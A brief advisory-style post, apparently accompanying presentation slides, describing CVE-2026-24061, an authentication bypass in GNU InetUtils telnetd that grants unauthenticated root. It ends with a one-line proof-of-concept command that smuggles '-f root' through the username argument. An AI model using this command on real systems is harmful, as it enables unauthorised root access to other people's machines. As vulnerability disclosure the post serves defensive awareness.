JAN 25, 2026 • CVE
The Ghost of the 90s GNU InetUtils Telnetd Auth Bypass CVE-2026-24061
PRESENTATION SLIDES
This presentation is available as a PowerPoint file.
Download Presentation (.pptx)(For inline preview, please convert to PDF)
A critical vulnerability has been discovered in GNU Inetutils telnetd (versions 1.9.3 - 2.7) that allows unauthenticated remote attackers to gain root privileges.
The Susceptibility
This vulnerability (CVE-2026-24061) is an authentication bypass caused by improper handling of user-supplied environment variables. It has existed in the codebase for over a decade (since 2015) but was only recently disclosed.
Exploit Mechanics
The vulnerability is trivial to exploit. An attacker simply needs to supply a malicious USER environment variable during the initial handshake.
# Example Proof-of-Concept telnet -l "-f root" <target-ip>